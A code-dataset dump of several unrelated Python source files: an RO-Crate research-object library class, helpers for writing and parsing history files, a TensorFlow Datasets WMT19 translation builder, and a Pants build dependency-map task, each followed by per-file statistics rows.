def name(self, value):
self.root_dataset['name'] = value
@property
def datePublished(self):
return self.root_dataset.datePublished
@datePublished.setter
def datePublished(self, value):
self.root_dataset.datePublished = value
@property
def creator(self):
return self.root_dataset['creator']
@creator.setter
def creator(self, value):
self.root_dataset['creator'] = value
@property
def license(self):
return self.root_dataset['license']
@license.setter
def license(self, value):
self.root_dataset['license'] = value
@property
def description(self):
return self.root_dataset['description']
@description.setter
def description(self, value):
self.root_dataset['description'] = value
@property
def keywords(self):
return self.root_dataset['keywords']
@keywords.setter
def keywords(self, value):
self.root_dataset['keywords'] = value
@property
def publisher(self):
return self.root_dataset['publisher']
@publisher.setter
def publisher(self, value):
self.root_dataset['publisher'] = value
@property
def isBasedOn(self):
return self.root_dataset['isBasedOn']
@isBasedOn.setter
def isBasedOn(self, value):
self.root_dataset['isBasedOn'] = value
@property
def image(self):
return self.root_dataset['image']
@image.setter
def image(self, value):
self.root_dataset['image'] = value
@property
def CreativeWorkStatus(self):
return self.root_dataset['CreativeWorkStatus']
@CreativeWorkStatus.setter
def CreativeWorkStatus(self, value):
self.root_dataset['CreativeWorkStatus'] = value
@property
def test_dir(self):
rval = self.dereference("test")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def examples_dir(self):
rval = self.dereference("examples")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def test_metadata_path(self):
if self.test_dir is None:
return None
return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
def resolve_id(self, relative_id):
return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
def set_main_entity(self, main_entity):
self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
# source: file object or path (str)
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
def remove_file(self, file_id):
# if file in data_entities:
self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
def remove_directory(self, dir_id):
# if file in data_entities:
self._remove_data_entity(dir_id)
def _add_data_entity(self, data_entity):
self._remove_data_entity(data_entity)
self.data_entities.append(data_entity)
def _remove_data_entity(self, data_entity):
if data_entity in self.data_entities:
self.data_entities.remove(data_entity)
################################
# Contextual entities #
################################
def _add_context_entity(self, entity):
if entity in self.contextual_entities:
self.contextual_entities.remove(entity)
self.contextual_entities.append(entity)
def add_person(self, identifier=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
new_person = Person(self, identifier, props)
self._add_context_entity(new_person)
return new_person
# TODO
# def fetch_all(self):
# fetch all files defined in the crate
# write crate to local dir
def write_crate(self, base_path):
Path(base_path).mkdir(parents=True, exist_ok=True)
# write data entities
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write(base_path)
def write_zip(self, out_zip):
if str(out_zip).endswith('.zip'):
out_file_path = out_zip
else:
out_file_path = out_zip + '.zip'
zf = zipfile.ZipFile(
out_file_path, 'w', compression=zipfile.ZIP_DEFLATED,
allowZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| 37.42093 | 136 | 0.618358 |
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
self.uuid = uuid.uuid4()
if not source_path or not load_preview:
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
def entities_from_metadata(self, metadata_path):
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
def build_crate(self, entities, source, load_preview):
(metadata_id, root_id) = self.find_root_entity_id(entities)
root_entity = entities[root_id]
root_entity_parts = root_entity['hasPart']
root_entity.pop('@id', None)
root_entity.pop('hasPart', None)
self.root_dataset = RootDataset(self, root_entity)
self.default_entities.append(self.root_dataset)
if Preview.BASENAME in entities.keys() and load_preview:
preview_source = os.path.join(source, Preview.BASENAME)
self.preview = Preview(self, preview_source)
self.default_entities.append(self.preview)
added_entities = []
for data_entity_ref in root_entity_parts:
data_entity_id = data_entity_ref['@id']
entity = entities[data_entity_id]
if '@type' not in entity.keys():
raise Exception("Entity with @id:" + data_entity_id +
" has no type defined")
entity_types = (entity['@type']
if isinstance(entity['@type'], list)
else [entity['@type']])
if 'File' in entity_types:
file_path = os.path.join(source, entity['@id'])
identifier = entity.pop('@id', None)
if os.path.exists(file_path):
instance = File(self, file_path, identifier, properties=entity)
else:
try:
requests.get(identifier)
instance = File(self, identifier, properties=entity)
except requests.ConnectionError:
print("Source is not a valid URI")
if 'Dataset' in entity_types:
dir_path = os.path.join(source, entity['@id'])
if os.path.exists(dir_path):
props = {k: v for k, v in entity.items() if k != '@id'}
instance = Dataset(self, dir_path, entity['@id'], props)
else:
raise Exception('Directory not found')
self._add_data_entity(instance)
added_entities.append(data_entity_id)
prebuilt_entities = [
root_id, metadata_id, Preview.BASENAME
]
for identifier, entity in entities.items():
if identifier not in added_entities + prebuilt_entities:
entity.pop('@id', None)
if entity['@type'] in [
cls.__name__
for cls in contextentity.ContextEntity.__subclasses__()
]:
module_name = 'rocrate.model.' + entity['@type'].lower()
SubClass = getattr(
importlib.import_module(module_name, package=None),
entity['@type']
)
instance = SubClass(self, identifier, entity)
else:
instance = contextentity.ContextEntity(
self, identifier, entity
)
self._add_context_entity(instance)
@property
def name(self):
return self.root_dataset['name']
@name.setter
def name(self, value):
self.root_dataset['name'] = value
@property
def datePublished(self):
return self.root_dataset.datePublished
@datePublished.setter
def datePublished(self, value):
self.root_dataset.datePublished = value
@property
def creator(self):
return self.root_dataset['creator']
@creator.setter
def creator(self, value):
self.root_dataset['creator'] = value
@property
def license(self):
return self.root_dataset['license']
@license.setter
def license(self, value):
self.root_dataset['license'] = value
@property
def description(self):
return self.root_dataset['description']
@description.setter
def description(self, value):
self.root_dataset['description'] = value
@property
def keywords(self):
return self.root_dataset['keywords']
@keywords.setter
def keywords(self, value):
self.root_dataset['keywords'] = value
@property
def publisher(self):
return self.root_dataset['publisher']
@publisher.setter
def publisher(self, value):
self.root_dataset['publisher'] = value
@property
def isBasedOn(self):
return self.root_dataset['isBasedOn']
@isBasedOn.setter
def isBasedOn(self, value):
self.root_dataset['isBasedOn'] = value
@property
def image(self):
return self.root_dataset['image']
@image.setter
def image(self, value):
self.root_dataset['image'] = value
@property
def CreativeWorkStatus(self):
return self.root_dataset['CreativeWorkStatus']
@CreativeWorkStatus.setter
def CreativeWorkStatus(self, value):
self.root_dataset['CreativeWorkStatus'] = value
@property
def test_dir(self):
rval = self.dereference("test")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def examples_dir(self):
rval = self.dereference("examples")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def test_metadata_path(self):
if self.test_dir is None:
return None
return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
def resolve_id(self, relative_id):
return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
def set_main_entity(self, main_entity):
self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
def remove_file(self, file_id):
self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
def remove_directory(self, dir_id):
self._remove_data_entity(dir_id)
def _add_data_entity(self, data_entity):
self._remove_data_entity(data_entity)
self.data_entities.append(data_entity)
def _remove_data_entity(self, data_entity):
if data_entity in self.data_entities:
self.data_entities.remove(data_entity)
wZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| true | true |
f718fbc2d26d5ffb3491afb7372ff14d83ab4105 | 2,368 | py | Python | src/erdbeermet/tools/FileIO.py | bnittka/Erdbeermet | 43c73d4cf3a918090320c7519a9ea09014f46744 | [
"MIT"
] | 5 | 2021-12-02T14:53:02.000Z | 2022-01-03T08:24:16.000Z | src/erdbeermet/tools/FileIO.py | bnittka/Erdbeermet | 43c73d4cf3a918090320c7519a9ea09014f46744 | [
"MIT"
] | 1 | 2022-01-10T09:07:44.000Z | 2022-01-10T10:20:07.000Z | src/erdbeermet/tools/FileIO.py | bnittka/Erdbeermet | 43c73d4cf3a918090320c7519a9ea09014f46744 | [
"MIT"
] | 7 | 2021-12-13T14:56:33.000Z | 2022-01-18T17:47:38.000Z | # -*- coding: utf-8 -*-
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| 26.909091 | 130 | 0.425676 |
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| true | true |
f718fd3a703f958aab1607b729f55dd3d248123d | 2,222 | py | Python | tensorflow_datasets/translate/wmt19.py | leenamaheshnikam10/datasets | 762cc556c364ecbb930b825709aa81647d889300 | [
"Apache-2.0"
] | 2 | 2019-10-20T05:40:10.000Z | 2019-10-31T17:25:52.000Z | tensorflow_datasets/translate/wmt19.py | thanhkaist/datasets | 02da35c558ec8ea704e744a2008c5cecb2e7a0a1 | [
"Apache-2.0"
] | 1 | 2019-04-09T07:50:49.000Z | 2019-04-09T07:51:10.000Z | tensorflow_datasets/translate/wmt19.py | thanhkaist/datasets | 02da35c558ec8ea704e744a2008c5cecb2e7a0a1 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WMT19: Translate dataset."""
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
# TODO(adarob): Update with citation of overview paper once it is published.
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
"""WMT 19 translation datasets for {(xx, "en")} + ("fr", "de") pairs."""
BUILDER_CONFIGS = [
wmt.WmtConfig( # pylint:disable=g-complex-comprehension
description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
url=_URL,
citation=_CITATION,
language_pair=(l1, l2),
version="0.0.3")
for l1, l2 in _LANGUAGE_PAIRS
]
@property
def _subsets(self):
return {
tfds.Split.TRAIN: [
"europarl_v9", "europarl_v7_frde", "paracrawl_v3",
"paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
"commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
"czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
"rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
tfds.Split.VALIDATION: [
"euelections_dev2019", "newsdev2019", "newstest2018"]
}
| 36.42623 | 115 | 0.673267 |
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
BUILDER_CONFIGS = [
wmt.WmtConfig(
description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
url=_URL,
citation=_CITATION,
language_pair=(l1, l2),
version="0.0.3")
for l1, l2 in _LANGUAGE_PAIRS
]
@property
def _subsets(self):
return {
tfds.Split.TRAIN: [
"europarl_v9", "europarl_v7_frde", "paracrawl_v3",
"paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
"commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
"czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
"rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
tfds.Split.VALIDATION: [
"euelections_dev2019", "newsdev2019", "newstest2018"]
}
| true | true |
f71900153bd1b94d6b9815bcc58db5cfd55c8cd4 | 8,530 | py | Python | src/python/twitter/pants/tasks/depmap.py | wfarner/commons | 42988a7a49f012665174538cca53604c7846ee86 | [
"Apache-2.0"
] | 1 | 2019-12-20T14:13:27.000Z | 2019-12-20T14:13:27.000Z | src/python/twitter/pants/tasks/depmap.py | wfarner/commons | 42988a7a49f012665174538cca53604c7846ee86 | [
"Apache-2.0"
] | null | null | null | src/python/twitter/pants/tasks/depmap.py | wfarner/commons | 42988a7a49f012665174538cca53604c7846ee86 | [
"Apache-2.0"
] | 1 | 2019-12-20T14:13:29.000Z | 2019-12-20T14:13:29.000Z | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
"""Generates either a textual dependency tree or a graphviz digraph dot file for the dependency
set of a target.
"""
@staticmethod
def _is_jvm(dep):
return is_jvm(dep) or is_jvm_app(dep)
@classmethod
def setup_parser(cls, option_group, args, mkflags):
super(Depmap, cls).setup_parser(option_group, args, mkflags)
cls.internal_only_flag = mkflags("internal-only")
cls.external_only_flag = mkflags("external-only")
option_group.add_option(cls.internal_only_flag,
action="store_true",
dest="depmap_is_internal_only",
default=False,
help='Specifies that only internal dependencies should'
' be included in the graph output (no external jars).')
option_group.add_option(cls.external_only_flag,
action="store_true",
dest="depmap_is_external_only",
default=False,
help='Specifies that only external dependencies should'
' be included in the graph output (only external jars).')
option_group.add_option(mkflags("minimal"),
action="store_true",
dest="depmap_is_minimal",
default=False,
help='For a textual dependency tree, only prints a dependency the 1st'
' time it is encountered. For graph output this does nothing.')
option_group.add_option(mkflags("separator"),
dest="depmap_separator",
default="-",
help='Specifies the separator to use between the org/name/rev'
' components of a dependency\'s fully qualified name.')
option_group.add_option(mkflags("graph"),
action="store_true",
dest="depmap_is_graph",
default=False,
help='Specifies the internal dependency graph should be'
' output in the dot digraph format')
def __init__(self, context):
ConsoleTask.__init__(self, context)
if (self.context.options.depmap_is_internal_only
and self.context.options.depmap_is_external_only):
cls = self.__class__
error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
cls.external_only_flag)
raise TaskError(error_str)
self.is_internal_only = self.context.options.depmap_is_internal_only
self.is_external_only = self.context.options.depmap_is_external_only
self.is_minimal = self.context.options.depmap_is_minimal
self.is_graph = self.context.options.depmap_is_graph
self.separator = self.context.options.depmap_separator
def console_output(self, targets):
if len(self.context.target_roots) == 0:
raise TaskError("One or more target addresses are required.")
for target in self.context.target_roots:
if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
if self.is_graph:
return self._output_digraph(target)
else:
return self._output_dependency_tree(target)
elif is_python(target):
raise TaskError('Unsupported for Python targets')
else:
raise TaskError('Unsupported for target %s' % target)
def _dep_id(self, dependency):
"""Returns a tuple of dependency_id , is_internal_dep."""
params = dict(sep=self.separator)
if isinstance(dependency, JarDependency):
params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
else:
params.update(org='internal', name=dependency.id)
if params.get('rev'):
return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
else:
return "%(org)s%(sep)s%(name)s" % params, True
def _output_dependency_tree(self, target):
def output_dep(dep, indent):
return "%s%s" % (indent * " ", dep)
def output_deps(dep, indent=0, outputted=set()):
dep_id, _ = self._dep_id(dep)
if dep_id in outputted:
return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
else:
output = []
if not self.is_external_only:
output += [output_dep(dep_id, indent)]
outputted.add(dep_id)
indent += 1
if self._is_jvm(dep):
for internal_dep in dep.internal_dependencies:
output += output_deps(internal_dep, indent, outputted)
if not self.is_internal_only:
if self._is_jvm(dep):
for jar_dep in dep.jar_dependencies:
jar_dep_id, internal = self._dep_id(jar_dep)
if not internal:
if jar_dep_id not in outputted or (not self.is_minimal
and not self.is_external_only):
output += [output_dep(jar_dep_id, indent)]
outputted.add(jar_dep_id)
return output
return [dependency for t in target.resolve() for dependency in output_deps(t)]
def _output_digraph(self, target):
def output_candidate(internal):
return ((self.is_internal_only and internal)
or (self.is_external_only and not internal)
or (not self.is_internal_only and not self.is_external_only))
def output_dep(dep):
dep_id, internal = self._dep_id(dep)
science_styled = internal and not self.is_internal_only
twitter_styled = not internal and dep.org.startswith('com.twitter')
if science_styled:
fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
return fmt % {'id': dep_id}
elif twitter_styled:
return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
else:
return ' "%s";' % dep_id
def output_deps(outputted, dep):
output = []
if dep not in outputted:
outputted.add(dep)
for dependency in dep.resolve():
if self._is_jvm(dependency):
for internal_dependency in dependency.internal_dependencies:
output += output_deps(outputted, internal_dependency)
for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
jar_id, internal = self._dep_id(jar)
if output_candidate(internal):
if jar not in outputted:
output += [output_dep(jar)]
outputted.add(jar)
target_id, _ = self._dep_id(target)
dep_id, _ = self._dep_id(dependency)
left_id = target_id if self.is_external_only else dep_id
if (left_id, jar_id) not in outputted:
styled = internal and not self.is_internal_only
output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
' [style="dashed"]' if styled else '')]
outputted.add((left_id, jar_id))
return output
return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| 43.520408 | 100 | 0.59027 |
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
@staticmethod
def _is_jvm(dep):
return is_jvm(dep) or is_jvm_app(dep)
@classmethod
def setup_parser(cls, option_group, args, mkflags):
super(Depmap, cls).setup_parser(option_group, args, mkflags)
cls.internal_only_flag = mkflags("internal-only")
cls.external_only_flag = mkflags("external-only")
option_group.add_option(cls.internal_only_flag,
action="store_true",
dest="depmap_is_internal_only",
default=False,
help='Specifies that only internal dependencies should'
' be included in the graph output (no external jars).')
option_group.add_option(cls.external_only_flag,
action="store_true",
dest="depmap_is_external_only",
default=False,
help='Specifies that only external dependencies should'
' be included in the graph output (only external jars).')
option_group.add_option(mkflags("minimal"),
action="store_true",
dest="depmap_is_minimal",
default=False,
help='For a textual dependency tree, only prints a dependency the 1st'
' time it is encountered. For graph output this does nothing.')
option_group.add_option(mkflags("separator"),
dest="depmap_separator",
default="-",
help='Specifies the separator to use between the org/name/rev'
' components of a dependency\'s fully qualified name.')
option_group.add_option(mkflags("graph"),
action="store_true",
dest="depmap_is_graph",
default=False,
help='Specifies the internal dependency graph should be'
' output in the dot digraph format')
def __init__(self, context):
ConsoleTask.__init__(self, context)
if (self.context.options.depmap_is_internal_only
and self.context.options.depmap_is_external_only):
cls = self.__class__
error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
cls.external_only_flag)
raise TaskError(error_str)
self.is_internal_only = self.context.options.depmap_is_internal_only
self.is_external_only = self.context.options.depmap_is_external_only
self.is_minimal = self.context.options.depmap_is_minimal
self.is_graph = self.context.options.depmap_is_graph
self.separator = self.context.options.depmap_separator
def console_output(self, targets):
if len(self.context.target_roots) == 0:
raise TaskError("One or more target addresses are required.")
for target in self.context.target_roots:
if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
if self.is_graph:
return self._output_digraph(target)
else:
return self._output_dependency_tree(target)
elif is_python(target):
raise TaskError('Unsupported for Python targets')
else:
raise TaskError('Unsupported for target %s' % target)
def _dep_id(self, dependency):
params = dict(sep=self.separator)
if isinstance(dependency, JarDependency):
params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
else:
params.update(org='internal', name=dependency.id)
if params.get('rev'):
return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
else:
return "%(org)s%(sep)s%(name)s" % params, True
def _output_dependency_tree(self, target):
def output_dep(dep, indent):
return "%s%s" % (indent * " ", dep)
def output_deps(dep, indent=0, outputted=set()):
dep_id, _ = self._dep_id(dep)
if dep_id in outputted:
return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
else:
output = []
if not self.is_external_only:
output += [output_dep(dep_id, indent)]
outputted.add(dep_id)
indent += 1
if self._is_jvm(dep):
for internal_dep in dep.internal_dependencies:
output += output_deps(internal_dep, indent, outputted)
if not self.is_internal_only:
if self._is_jvm(dep):
for jar_dep in dep.jar_dependencies:
jar_dep_id, internal = self._dep_id(jar_dep)
if not internal:
if jar_dep_id not in outputted or (not self.is_minimal
and not self.is_external_only):
output += [output_dep(jar_dep_id, indent)]
outputted.add(jar_dep_id)
return output
return [dependency for t in target.resolve() for dependency in output_deps(t)]
def _output_digraph(self, target):
def output_candidate(internal):
return ((self.is_internal_only and internal)
or (self.is_external_only and not internal)
or (not self.is_internal_only and not self.is_external_only))
def output_dep(dep):
dep_id, internal = self._dep_id(dep)
science_styled = internal and not self.is_internal_only
twitter_styled = not internal and dep.org.startswith('com.twitter')
if science_styled:
fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
return fmt % {'id': dep_id}
elif twitter_styled:
return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
else:
return ' "%s";' % dep_id
def output_deps(outputted, dep):
output = []
if dep not in outputted:
outputted.add(dep)
for dependency in dep.resolve():
if self._is_jvm(dependency):
for internal_dependency in dependency.internal_dependencies:
output += output_deps(outputted, internal_dependency)
for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
jar_id, internal = self._dep_id(jar)
if output_candidate(internal):
if jar not in outputted:
output += [output_dep(jar)]
outputted.add(jar)
target_id, _ = self._dep_id(target)
dep_id, _ = self._dep_id(dependency)
left_id = target_id if self.is_external_only else dep_id
if (left_id, jar_id) not in outputted:
styled = internal and not self.is_internal_only
output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
' [style="dashed"]' if styled else '')]
outputted.add((left_id, jar_id))
return output
return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| true | true |
